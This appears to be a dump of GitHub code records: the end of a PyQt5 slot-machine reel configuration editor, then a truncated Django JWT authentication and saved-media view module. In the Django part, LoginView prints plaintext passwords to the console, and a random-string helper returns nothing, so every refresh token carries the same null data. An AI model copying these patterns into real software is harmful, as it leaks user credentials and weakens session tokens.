2)\n self.base.label.setAlignment(QtCore.Qt.AlignCenter)\n self.free.fon.addWidget(self.free.label, 0, 0, 1, 2)\n self.free.label.setAlignment(QtCore.Qt.AlignCenter)\n self.fon_type.addWidget(self.free, 0, 1, 1, 1)\n self.button_free.setIcon(QtGui.QIcon('icons/noedit.png'))\n self.button_free.setToolTip('Cancel editing')\n self.free.fon_cancel.addWidget(self.button_free)\n self.button_state = False\n\n else:\n self.fon_type.setColumnStretch(1, 1)\n self.fon_button.addWidget(self.button_free)\n\n self.base.fon.removeWidget(self.base.label)\n sip.delete(self.base.label)\n self.base.label = QtWidgets.QLabel('base game')\n\n self.free.fon.removeWidget(self.free.label)\n sip.delete(self.free.label)\n self.free.label = QtWidgets.QLabel('free game')\n\n self.fon_type.removeWidget(self.free)\n sip.delete(self.free)\n self.free = None\n self.button_free.setIcon(QtGui.QIcon('icons/edit.png'))\n self.button_free.setToolTip('Edit free game properties')\n self.button_state = True\n\n string_validate = string_validate\n\n def collect_info(self):\n d = {}\n d.update({'name': str(self.line_name.text())})\n d.update({'payment': self.line_payment.collect_info()})\n d.update({'base': self.base.collect_info()})\n if self.free is not None:\n d.update({'free': self.free.collect_info()})\n return d\n\n def set_info(self, interim_symbol):\n self.line_name.setText(str(interim_symbol['name']))\n self.line_payment.set_info(interim_symbol['payment'])\n if 'base' in interim_symbol:\n self.base.set_info(interim_symbol['base'])\n if 'free' in interim_symbol:\n self.button_free_clicked()\n self.free.set_info(interim_symbol['free'])\n\n\nclass Window(QtWidgets.QWidget):\n def __init__(self):\n super(Window, self).__init__()\n\n self.fon_scroll = QtWidgets.QHBoxLayout()\n self.scroll = QtWidgets.QScrollArea()\n self.widget = QtWidgets.QWidget()\n self.fon = QtWidgets.QGridLayout()\n\n self.box_rules = QtWidgets.QGroupBox('Rules')\n self.fon_rules = QtWidgets.QGridLayout()\n\n self.box_param = QtWidgets.QGroupBox('Parameters')\n self.fon_param = QtWidgets.QGridLayout()\n\n self.box_frequency = QtWidgets.QGroupBox('Frequency')\n self.fon_frequency = QtWidgets.QGridLayout()\n\n self.button_switch = QtWidgets.QPushButton()\n self.button_switch.setIcon(QtGui.QIcon('icons/switch.png'))\n self.button_switch.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n self.button_switch.setFixedWidth(28)\n\n self.param_mode = True\n\n self.label_window = QtWidgets.QLabel('window')\n self.line_width = QtWidgets.QLineEdit('5')\n self.line_height = QtWidgets.QLineEdit('3')\n self.width = 5\n self.height = 3\n\n self.fon_window = QtWidgets.QHBoxLayout()\n\n self.label_symbol = QtWidgets.QLabel('symbols')\n self.frame_symbols = QtWidgets.QFrame()\n self.fon_symbols = QtWidgets.QVBoxLayout()\n self.grid_symbols = QtWidgets.QGridLayout()\n self.count_symbols = 0\n\n self.add_symbol = QtWidgets.QPushButton('Add symbol')\n\n self.symbols = []\n self.deleteButtons = []\n\n self.label_lines = QtWidgets.QLabel('lines')\n self.frame_lines = QtWidgets.QFrame()\n self.fon_lines = QtWidgets.QVBoxLayout()\n self.grid_lines = QtWidgets.QGridLayout()\n self.count_lines = 0\n\n self.add_line = QtWidgets.QPushButton('Add line')\n\n self.lines = []\n self.deleteLines = []\n\n self.label_freemultiplier = QtWidgets.QLabel('free multiplier')\n self.line_freemultiplier = QtWidgets.QLineEdit()\n\n self.label_distance = QtWidgets.QLabel('distance')\n self.line_distance = QtWidgets.QLineEdit()\n\n self.label_rtp = QtWidgets.QLabel('RTP')\n self.line_rtp = QtWidgets.QLineEdit()\n self.line_rtp_error = QtWidgets.QLineEdit()\n\n self.label_volatility = QtWidgets.QLabel('volatility ')\n self.line_volatility = QtWidgets.QLineEdit()\n self.line_volatility_error = QtWidgets.QLineEdit()\n\n self.label_hitrate = QtWidgets.QLabel('hitrate')\n self.line_hitrate = QtWidgets.QLineEdit()\n self.line_hitrate_error = QtWidgets.QLineEdit()\n\n self.label_baseRTP = QtWidgets.QLabel('base RTP')\n self.line_baseRTP = QtWidgets.QLineEdit()\n self.line_baseRTP_error = QtWidgets.QLineEdit()\n\n self.frequency = []\n\n self.init_ui()\n\n def init_ui(self):\n #self.fon.setColumnStretch(0, 4)\n #self.fon.setColumnStretch(1, 4)\n self.fon.setRowStretch(0, 4)\n\n self.fon_rules.setRowStretch(2, 40)\n self.fon_rules.setRowStretch(4, 40)\n\n self.fon_rules.setColumnStretch(4, 4)\n self.fon_rules.setColumnStretch(5, 4)\n\n self.fon_param.setColumnStretch(3, 4)\n\n self.fon_rules.addWidget(self.label_window, 0, 0)\n\n self.fon_rules.addWidget(self.line_width, 0, 1)\n self.line_width.setFixedWidth(80)\n self.fon_rules.addWidget(self.line_height, 0, 2)\n self.line_height.setFixedWidth(80)\n\n self.line_width.textChanged.connect(self.width_changed)\n self.line_width.textChanged.connect(lambda: self.int_validate(1, sys.maxsize))\n self.line_height.textChanged.connect(self.height_changed)\n self.line_height.textChanged.connect(lambda: self.int_validate(1, sys.maxsize))\n\n # symbols\n self.grid_symbols.setHorizontalSpacing(0)\n\n self.fon_rules.addWidget(self.label_symbol, 1, 0)\n self.fon_rules.addWidget(self.frame_symbols, 1, 1, 2, 4)\n self.frame_symbols.setLayout(self.fon_symbols)\n self.frame_symbols.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_symbols.setFrameShadow(QtWidgets.QFrame.Plain)\n self.grid_lines.setVerticalSpacing(0)\n\n self.fon_symbols.addLayout(self.grid_symbols)\n self.fon_symbols.setStretchFactor(self.grid_symbols, 40)\n self.fon_symbols.addWidget(self.add_symbol)\n\n self.add_symbol.clicked.connect(lambda: self.click_add_symbol())\n\n # lines\n self.grid_lines.setHorizontalSpacing(0)\n\n self.fon_rules.addWidget(self.label_lines, 3, 0)\n self.fon_rules.addWidget(self.frame_lines, 3, 1, 2, 3)\n self.frame_lines.setLayout(self.fon_lines)\n self.frame_lines.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_lines.setFrameShadow(QtWidgets.QFrame.Plain)\n\n self.fon_lines.addLayout(self.grid_lines)\n self.fon_lines.setStretchFactor(self.grid_lines, 40)\n self.fon_lines.addWidget(self.add_line)\n\n self.add_line.clicked.connect(self.click_add_line)\n\n self.fon_rules.addWidget(self.label_freemultiplier, 5, 0)\n self.fon_rules.addWidget(self.line_freemultiplier, 5, 1, 1, 2)\n self.line_freemultiplier.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_rules.addWidget(self.label_distance, 6, 0)\n self.fon_rules.addWidget(self.line_distance, 6, 1, 1, 2)\n self.line_distance.textChanged.connect(lambda: self.int_validate(0, len(self.symbols)))\n\n self.fon_param.addWidget(self.label_rtp, 7, 0)\n self.fon_param.addWidget(self.line_rtp, 7, 1)\n self.line_rtp.setFixedWidth(80)\n self.fon_param.addWidget(self.line_rtp_error, 7, 2)\n self.line_rtp_error.setFixedWidth(80)\n self.line_rtp.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_rtp_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_volatility, 8, 0)\n self.fon_param.addWidget(self.line_volatility, 8, 1)\n self.line_volatility.setFixedWidth(80)\n self.fon_param.addWidget(self.line_volatility_error, 8, 2)\n self.line_volatility_error.setFixedWidth(80)\n self.line_volatility.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_volatility_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_hitrate, 9, 0)\n self.fon_param.addWidget(self.line_hitrate, 9, 1)\n self.line_hitrate.setFixedWidth(80)\n self.fon_param.addWidget(self.line_hitrate_error, 9, 2)\n self.line_hitrate_error.setFixedWidth(80)\n self.line_hitrate.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_hitrate_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.fon_param.addWidget(self.label_baseRTP, 10, 0)\n self.fon_param.addWidget(self.line_baseRTP, 10, 1)\n self.line_baseRTP.setFixedWidth(80)\n self.fon_param.addWidget(self.line_baseRTP_error, 10, 2)\n self.line_baseRTP_error.setFixedWidth(80)\n self.line_baseRTP.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n self.line_baseRTP_error.textChanged.connect(lambda: self.float_validate(0, sys.maxsize))\n\n self.button_switch.clicked.connect(self.switch_mode)\n\n self.box_rules.setLayout(self.fon_rules)\n self.box_param.setLayout(self.fon_param)\n self.box_frequency.setLayout(self.fon_frequency)\n\n self.fon.addWidget(self.box_rules, 0, 0, 1, 3)\n self.fon.addWidget(self.box_param, 1, 0)\n\n self.fon.addWidget(self.button_switch, 1, 2)\n\n self.widget.setLayout(self.fon)\n self.scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n self.scroll.setWidgetResizable(True)\n self.scroll.setWidget(self.widget)\n self.fon_scroll.addWidget(self.scroll)\n self.setLayout(self.fon_scroll)\n\n def click_add_symbol(self, opened=None):\n global default_color\n symbol = Symbol(self.count_symbols, self.width)\n self.symbols.append(symbol)\n\n button_delete = QtWidgets.QPushButton()\n button_delete.setIcon(QtGui.QIcon('icons/close.png'))\n button_delete.setToolTip('Delete symbol')\n button_delete.setFixedSize(28, 28)\n self.deleteButtons.append(button_delete)\n self.deleteButtons[-1].clicked.connect(self.click_delete_symbol)\n self.symbols[-1].fon_name.addWidget(self.deleteButtons[-1])\n self.grid_symbols.addWidget(self.symbols[-1], self.count_symbols, 0)\n\n self.count_symbols += 1\n\n self.line_distance.textChanged.emit(self.line_distance.text())\n\n freq = LabeledLine(str(self.symbols[-1].line_name.text()), default_color)\n self.frequency.append(freq)\n self.fon_frequency.addWidget(self.frequency[-1], 0, self.count_symbols)\n\n if opened is None:\n QtWidgets.QApplication.processEvents()\n QtCore.QTimer.singleShot(0, self.sup_add_symbol)\n\n def sup_add_symbol(self):\n x = self.symbols[-1].x()\n y = self.symbols[-1].y()\n width = self.symbols[-1].geometry().width()\n height = self.symbols[-1].geometry().height()\n\n self.add_symbol_anim = QtCore.QPropertyAnimation(self.symbols[-1], b\"geometry\")\n self.add_symbol_button_anim = QtCore.QPropertyAnimation(self.add_symbol, b\"geometry\")\n self.add_symbol_anim.setDuration(160)\n self.add_symbol_button_anim.setDuration(160)\n self.add_symbol_anim.setStartValue(QtCore.QRect(x, y, width, 0))\n self.add_symbol_button_anim.setStartValue(QtCore.QRect(self.add_symbol.x(), self.add_symbol.y() - height, self.add_symbol.width(), self.add_symbol.height()))\n self.add_symbol_anim.setEndValue(QtCore.QRect(x, y, width, height))\n self.add_symbol_button_anim.setEndValue(QtCore.QRect(self.add_symbol.x(), y + height, self.add_symbol.width(), self.add_symbol.height()))\n self.add_symbol_anim.start()\n self.add_symbol_button_anim.start()\n\n dist = 137 - self.geometry().height() + (y + height) + self.widget.pos().y()\n if dist > 0:\n scroll = self.scroll.verticalScrollBar()\n scroll.setSingleStep(10)\n for i in range(int(dist/10)):\n QtCore.QTimer.singleShot(10 * i, lambda: scroll.triggerAction(QtWidgets.QAbstractSlider.SliderSingleStepAdd))\n\n def click_delete_symbol(self):\n sender = self.sender()\n num = self.deleteButtons.index(sender)\n\n height = self.symbols[num].geometry().height()\n self.del_symbol_anim = QtCore.QPropertyAnimation(self.symbols[num], b'minimumHeight')\n self.del_symbol_anim.setDuration(160)\n self.del_symbol_anim.setStartValue(height)\n self.del_symbol_anim.setEndValue(0)\n self.del_symbol_anim.start()\n\n QtCore.QTimer.singleShot(160, lambda: self.sub_del_symbol(num))\n\n self.line_distance.textChanged.emit(self.line_distance.text())\n\n def sub_del_symbol(self, num):\n self.grid_symbols.removeWidget(self.symbols[num])\n sip.delete(self.symbols[num])\n del self.symbols[num]\n del self.deleteButtons[num]\n\n def click_add_line(self):\n line = LineEdits(self.width, 28, 1, self.height, 24, 0)\n self.lines.append(line)\n\n button_delete = QtWidgets.QPushButton()\n button_delete.setIcon(QtGui.QIcon('icons/close.png'))\n button_delete.setFixedSize(26, 26)\n self.deleteLines.append(button_delete)\n self.deleteLines[-1].clicked.connect(self.click_delete_line)\n\n self.grid_lines.addWidget(self.lines[-1], self.count_lines, 0)\n\n self.grid_lines.addWidget(self.deleteLines[-1], self.count_lines, 1)\n\n self.count_lines += 1\n\n def click_delete_line(self):\n sender = self.sender()\n num = self.deleteLines.index(sender)\n\n self.grid_lines.removeWidget(self.lines[num])\n sip.delete(self.lines[num])\n del self.lines[num]\n\n self.grid_lines.removeWidget(self.deleteLines[num])\n sip.delete(self.deleteLines[num])\n del self.deleteLines[num]\n\n def switch_mode(self):\n if self.param_mode is False:\n width = self.box_frequency.width()\n self.freq_anim = QtCore.QPropertyAnimation(self.box_frequency, b'maximumWidth')\n self.param_anim = QtCore.QPropertyAnimation(self.box_param, b'maximumWidth')\n self.freq_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.param_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.freq_anim.setDuration(320)\n self.param_anim.setDuration(320)\n self.freq_anim.setStartValue(width)\n self.param_anim.setStartValue(0)\n self.freq_anim.setEndValue(0)\n self.param_anim.setEndValue(width)\n self.freq_anim.start()\n self.param_anim.start()\n self.param_mode = True\n\n else:\n self.fon.addWidget(self.box_frequency, 1, 1)\n width = self.box_param.width()\n self.freq_anim = QtCore.QPropertyAnimation(self.box_frequency, b'maximumWidth')\n self.param_anim = QtCore.QPropertyAnimation(self.box_param, b'maximumWidth')\n self.freq_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.param_anim.setEasingCurve(QtCore.QEasingCurve.InQuad)\n self.freq_anim.setDuration(320)\n self.param_anim.setDuration(320)\n self.freq_anim.setStartValue(0)\n self.param_anim.setStartValue(width)\n self.freq_anim.setEndValue(width)\n self.param_anim.setEndValue(0)\n self.freq_anim.start()\n self.param_anim.start()\n self.param_mode = False\n\n def width_changed(self):\n if isint(str(self.line_width.text())) > 0:\n self.width = int(str(self.line_width.text()))\n for i in range(len(self.symbols)):\n self.symbols[i].width = self.width\n\n self.symbols[i].fon_payment.removeWidget(self.symbols[i].line_payment)\n sip.delete(self.symbols[i].line_payment)\n\n self.symbols[i].line_payment = LineEdits(self.width, 40, 0, sys.maxsize, None, None, True)\n self.symbols[i].fon_payment.addWidget(self.symbols[i].line_payment)\n\n self.symbols[i].base.width = self.width\n\n self.symbols[i].base.fon.removeWidget(self.symbols[i].base.buttons_position)\n sip.delete(self.symbols[i].base.buttons_position)\n self.symbols[i].base.buttons_position = SwitchButtons(self.width, 40)\n self.symbols[i].base.fon.addWidget(self.symbols[i].base.buttons_position, 2, 1)\n\n if self.symbols[i].base.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n self.symbols[i].base.fon.removeWidget(self.symbols[i].base.line_freespins)\n sip.delete(self.symbols[i].base.line_freespins)\n self.symbols[i].base.line_freespins = LineEdits(self.width, 28, 0, sys.maxsize, None, None, True)\n self.symbols[i].base.fon.addWidget(self.symbols[i].base.line_freespins, 4, 1)\n\n if self.symbols[i].free is not None:\n self.symbols[i].free.width = self.width\n\n self.symbols[i].free.fon.removeWidget(self.symbols[i].free.buttons_position)\n sip.delete(self.symbols[i].free.buttons_position)\n self.symbols[i].free.buttons_position = SwitchButtons(self.width, 28)\n self.symbols[i].free.fon.addWidget(self.symbols[i].free.buttons_position, 2, 1)\n\n if self.symbols[i].free.checkbox_scatter.checkState() == QtCore.Qt.Checked:\n self.symbols[i].free.fon.removeWidget(self.symbols[i].free.line_freespins)\n sip.delete(self.symbols[i].free.line_freespins)\n self.symbols[i].free.line_freespins = LineEdits(self.width, 28, 0, sys.maxsize, None, None, True)\n self.symbols[i].free.fon.addWidget(self.symbols[i].free.line_freespins, 4, 1)\n\n for i in range(len(self.lines)):\n pos = self.grid_lines.getItemPosition(self.grid_lines.indexOf(self.lines[i]))\n self.grid_lines.removeWidget(self.lines[i])\n sip.delete(self.lines[i])\n\n self.lines[i] = LineEdits(self.width, 28, 1, self.height, 24, 0)\n self.grid_lines.addWidget(self.lines[i], pos[0], pos[1])\n\n def height_changed(self):\n if isint(str(self.line_height.text())) > 0:\n self.height = int(str(self.line_height.text()))\n for line in self.lines:\n for atom in line.lines:\n try:\n atom.disconnect()\n except:\n pass\n\n atom.textChanged.connect(lambda: self.int_validate(1, self.height))\n atom.textChanged.emit(atom.text())\n\n int_validate = int_validate\n float_validate = float_validate\n\n def collect_info(self):\n d = {}\n d.update({'window': [self.width, self.height]})\n symbols = []\n for i in range(len(self.symbols)):\n symbols.append(self.symbols[i].collect_info())\n d.update({'symbols': symbols})\n\n lines = []\n for i in range(len(self.lines)):\n if self.lines[i].arrange_info() is not None:\n lines.append(self.lines[i].arrange_info())\n d.update({'lines': lines})\n\n if isint(str(self.line_freemultiplier.text())) >= 0:\n d.update({'free_multiplier': int(str(self.line_freemultiplier.text()))})\n\n if isint(str(self.line_distance.text())) >= 0:\n d.update({'distance': int(str(self.line_distance.text()))})\n\n if isfloat(str(self.line_rtp.text())) and isfloat(str(self.line_rtp_error.text())):\n d.update({'RTP': [float(str(self.line_rtp.text())), float(str(self.line_rtp_error.text()))]})\n\n if isfloat(str(self.line_volatility.text())) and isfloat(str(self.line_volatility_error.text())):\n d.update({'volatility': [float(str(self.line_volatility.text())), float(str(self.line_volatility_error.text()))]})\n\n if isfloat(str(self.line_hitrate.text())) and isfloat(str(self.line_hitrate_error.text())):\n d.update({'hitrate': [float(str(self.line_hitrate.text())), float(str(self.line_hitrate_error.text()))]})\n\n if isfloat(str(self.line_baseRTP.text())) and isfloat(str(self.line_baseRTP_error.text())):\n d.update({'baseRTP': [float(str(self.line_baseRTP.text())), float(str(self.line_baseRTP_error.text()))]})\n return d\n\n def set_info(self, interim):\n if 'window' in interim:\n self.line_width.setText(str(interim['window'][0]))\n self.width = interim['window'][0]\n self.line_height.setText(str(interim['window'][1]))\n self.height = interim['window'][1]\n\n for i in range(len(interim['symbols'])):\n self.click_add_symbol(True)\n self.symbols[i].set_info(interim['symbols'][i])\n\n for i in range(len(interim['lines'])):\n self.click_add_line()\n self.lines[i].fill_info(interim['lines'][i])\n\n if 'free_multiplier' in interim:\n self.line_freemultiplier.setText(str(interim['free_multiplier']))\n\n if 'distance' in interim:\n self.line_distance.setText(str(interim['distance']))\n\n if 'RTP' in interim:\n self.line_rtp.setText(str(interim['RTP'][0]))\n self.line_rtp_error.setText(str(interim['RTP'][1]))\n\n if 'volatility' in interim:\n self.line_volatility.setText(str(interim['volatility'][0]))\n self.line_volatility_error.setText(str(interim['volatility'][1]))\n\n if 'hitrate' in interim:\n self.line_hitrate.setText(str(interim['hitrate'][0]))\n self.line_hitrate_error.setText(str(interim['hitrate'][1]))\n\n if 'baseRTP' in interim:\n self.line_baseRTP.setText(str(interim['baseRTP'][0]))\n self.line_baseRTP_error.setText(str(interim['baseRTP'][1]))\n\n\nclass Main(QtWidgets.QMainWindow):\n def __init__(self):\n super(Main, self).__init__()\n\n self.setWindowTitle('Azino 777')\n self.setWindowIcon(QtGui.QIcon('icons/yarlyk.png'))\n self.setGeometry(200, 200, 1000, 600)\n\n self.tab = QtWidgets.QTabWidget()\n\n self.tool_file = self.addToolBar('file')\n self.tool_run = self.addToolBar('run')\n self.bar = self.menuBar()\n\n self.action_new = QtWidgets.QAction(QtGui.QIcon('icons/new.png'), 'New', self)\n self.action_new.setShortcut('Ctrl+N')\n self.action_new.triggered.connect(self.trigger_new)\n\n self.action_open = QtWidgets.QAction(QtGui.QIcon('icons/open.png'), 'Open', self)\n self.action_open.setShortcut('Ctrl+O')\n self.action_open.triggered.connect(self.trigger_open)\n\n self.action_save = QtWidgets.QAction(QtGui.QIcon('icons/save.png'), 'Save', self)\n self.action_save.setShortcut('Ctrl+S')\n self.action_save.triggered.connect(self.trigger_save)\n self.action_save.setEnabled(False)\n\n self.action_saveas = QtWidgets.QAction(QtGui.QIcon('icons/saveas.png'), 'Save as', self)\n self.action_saveas.setShortcut('Ctrl+Alt+S')\n self.action_saveas.triggered.connect(self.trigger_saveas)\n self.action_saveas.setEnabled(False)\n\n self.action_settings = QtWidgets.QAction(QtGui.QIcon('icons/settings.png'), 'Settings', self)\n\n self.action_quit = QtWidgets.QAction(QtGui.QIcon('icons/quit.png'), 'Quit', self)\n self.action_quit.setShortcut('Ctrl+Q')\n self.action_quit.triggered.connect(self.trigger_quit)\n\n self.action_submit = QtWidgets.QAction(QtGui.QIcon('icons/submit.png'), 'Submit', self)\n self.action_submit.triggered.connect(self.trigger_submit)\n\n self.action_run = QtWidgets.QAction(QtGui.QIcon('icons/run1.png'), 'Run', self)\n self.action_run.setEnabled(False)\n\n self.action_submitnrun = QtWidgets.QAction(QtGui.QIcon('icons/submitnrun1.png'), 'Submit and run', self)\n self.action_submitnrun.triggered.connect(self.trigger_submit)\n\n self.info = None\n\n self.json_path = None\n\n self.init_ui()\n\n def init_ui(self):\n self.setCentralWidget(self.tab)\n\n self.tab.setTabsClosable(True)\n self.tab.tabCloseRequested.connect(self.close_tab)\n self.tab.setMovable(True)\n\n file = self.bar.addMenu('File')\n run = self.bar.addMenu('Run')\n\n file.addAction(self.action_new)\n file.addAction(self.action_open)\n file.addAction(self.action_save)\n file.addAction(self.action_saveas)\n file.addAction(self.action_settings)\n file.addAction(self.action_quit)\n\n run.addAction(self.action_submit)\n run.addAction(self.action_run)\n run.addAction(self.action_submitnrun)\n\n self.tool_file.addAction(self.action_new)\n self.tool_file.addAction(self.action_open)\n self.tool_file.addAction(self.action_save)\n self.tool_file.addAction(self.action_saveas)\n\n self.tool_run.addAction(self.action_submit)\n self.tool_run.addAction(self.action_run)\n self.tool_run.addAction(self.action_submitnrun)\n\n def close_tab(self, current_index):\n current_widget = self.tab.widget(current_index)\n current_widget.deleteLater()\n self.tab.removeTab(current_index)\n if self.tab.__len__() == 0:\n self.action_submit.setEnabled(False)\n\n def trigger_submit(self):\n current = self.tab.currentWidget()\n self.info = current.collect_info()\n print(self.info)\n self.action_saveas.setEnabled(True)\n self.action_run.setEnabled(True)\n\n print(current.geometry())\n print(current.frame_symbols.geometry())\n for symbol in current.symbols:\n print(symbol.geometry())\n\n\n def trigger_new(self):\n global count_tabs\n new_tab = Window()\n self.tab.addTab(new_tab, 'untitled' + str(count_tabs))\n self.tab.setCurrentWidget(new_tab)\n count_tabs += 1\n self.action_submit.setEnabled(True)\n\n #button = QtWidgets.QPushButton('x')\n\n #tab_bar = self.tab.tabBar()\n #tab_bar.setTabButton(self.tab.currentIndex(), QtWidgets.QTabBar.RightSide, button)\n\n def trigger_save(self):\n file = open(self.json_path, 'w')\n json.dump(self.info, file)\n file.close()\n\n def trigger_saveas(self):\n self.json_path, _ = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File', '', 'All Files (*);;Json Files (*.json)')\n if self.json_path:\n file = open(self.json_path, 'w')\n json.dump(self.info, file)\n file.close()\n self.action_save.setEnabled(True)\n i = self.tab.currentIndex()\n self.tab.setTabText(i, str(path_leaf(self.json_path)))\n\n def trigger_open(self):\n self.json_path, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', '', 'All Files (*);;Json Files (*.json)')\n if self.json_path:\n file = open(self.json_path, 'r')\n j = file.read()\n self.info = json.loads(j)\n file.close()\n\n new_tab = Window()\n new_tab.set_info(self.info)\n\n self.tab.addTab(new_tab, str(path_leaf(self.json_path)))\n self.tab.setCurrentWidget(new_tab)\n\n self.action_save.setEnabled(True)\n self.action_saveas.setEnabled(True)\n self.action_run.setEnabled(True)\n\n def trigger_quit(self):\n QtWidgets.qApp.quit()\n\n\napp = QtWidgets.QApplication(sys.argv)\na_window = Main()\na_window.show()\nsys.exit(app.exec_())\n","repo_name":"DmitryBol/reel","sub_path":"FrontEnd/anime.py","file_name":"anime.py","file_ext":"py","file_size_in_byte":46088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15242874976","text":"import jwt\n\nimport remote_library.models\nfrom ..models import Jwt, Book, Video\nfrom ..models import CustomUser\nfrom datetime import datetime, timedelta\nfrom django.conf import settings\nimport random\nimport string\nfrom rest_framework.views import APIView\nfrom ..serializer import LoginSerializer, RegisterSerializer, RefreshSerializer, \\\n SaveBookSerializer, SaveVideoSerializer, VideoSerializer, BookSerializer\nfrom django.contrib.auth import authenticate\nfrom rest_framework.response import Response\n\n\ndef get_random(length):\n ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))\n\n\ndef get_access_token(payload):\n return jwt.encode(\n {\"exp\": datetime.now() + timedelta(minutes=5), **payload},\n settings.SECRET_KEY,\n algorithm=\"HS256\"\n )\n\n\ndef get_refresh_token():\n return jwt.encode(\n {\"exp\": datetime.now() + timedelta(days=365), \"data\": get_random(10)},\n settings.SECRET_KEY,\n algorithm=\"HS256\"\n )\n\n\nclass LoginView(APIView):\n serializer_class = LoginSerializer\n def post(self, requests):\n serializer = self.serializer_class(data=requests.data)\n serializer.is_valid(raise_exception=True)\n print(serializer.validated_data['password'])\n\n user = authenticate(username=serializer.validated_data['email'],\n password=serializer.validated_data['password'])\n print(\"user\", user)\n if not user:\n return Response({\"error\": \"Invalid email or password\"}, status=\"400\")\n # Jwt.objects.filter(user_id=user.id).delete()\n\n access = get_access_token({\"some\": user.id})\n refresh = get_refresh_token()\n Jwt.objects.create(\n user_id=user.id,\n access=access,\n refresh=refresh\n )\n return Response({\"access\": access, \"refresh\": refresh})\n\n\nclass RegisterView(APIView):\n serializer_class = RegisterSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n CustomUser.objects._create_user(**serializer.validated_data)\n\n return Response({\"success\": \"User created.\"})\n\n\ndef verify_token(token):\n #decode the token\n try:\n decoded_data = jwt.decode(token, settings.SECRET_KEY, algorithms=\"HS256\")\n except Exception:\n return None\n exp=decoded_data[\"exp\"]\n if datetime.now().timestamp() > exp:\n return None\n return decoded_data\n\n\nclass RefreshView(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n access = get_access_token({\"some\": active_jwt.user.id})\n refresh = get_refresh_token()\n\n active_jwt.access = access\n active_jwt.refresh = refresh\n active_jwt.save()\n return Response({\"access\": access, \"refresh\": refresh})\n\n\nclass LogOut(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n Jwt.objects.filter(refresh=active_jwt.refresh).delete()\n return Response({\"status\": \"Successfully logged out\"})\n\n\nclass SaveBook(APIView):\n serializer_class = SaveBookSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n book_id = serializer.validated_data[\"book_id\"]\n book_custom_user = Book.saved_by.through\n new_book_user = book_custom_user(book_id=book_id, customuser_id=id)\n new_book_user.save()\n return Response({\"status\": \"Success\"})\n\n\nclass SaveVideo(APIView):\n serializer_class = SaveVideoSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n video_id = serializer.validated_data[\"video_id\"]\n video_custom_user = Video.saved_by.through\n new_video_user = video_custom_user(video_id=video_id, customuser_id=id)\n new_video_user.save()\n return Response({\"status\": \"Success\"})\n\n\nclass SavedVideosView(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n video_custom_user = Video.saved_by.through\n videos = video_custom_user.objects.filter(customuser_id=id)\n data = []\n for video in videos:\n print(video.video_id)\n video_object = Video.objects.get(pk=video.video_id)\n video_serializer = VideoSerializer(video_object)\n data.append(video_serializer.data)\n return Response(data)\n\n\nclass SavedBooksView(APIView):\n serializer_class = RefreshSerializer\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not 